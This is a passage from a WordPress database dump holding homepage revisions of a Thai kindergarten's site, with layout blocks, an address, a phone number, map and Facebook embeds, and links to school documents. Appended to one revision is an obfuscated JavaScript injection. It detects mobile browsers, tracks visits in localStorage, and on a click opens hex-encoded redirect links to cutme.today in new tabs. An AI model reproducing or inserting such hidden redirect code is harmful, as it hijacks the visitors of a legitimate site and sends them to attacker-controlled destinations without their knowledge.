c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:53:49','2024-08-28 02:53:49','',19,'http://watprato.ssk.in.th/?p=240',0,'revision','',0),
(241,2,'2024-08-28 10:05:27','2024-08-28 03:05:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline 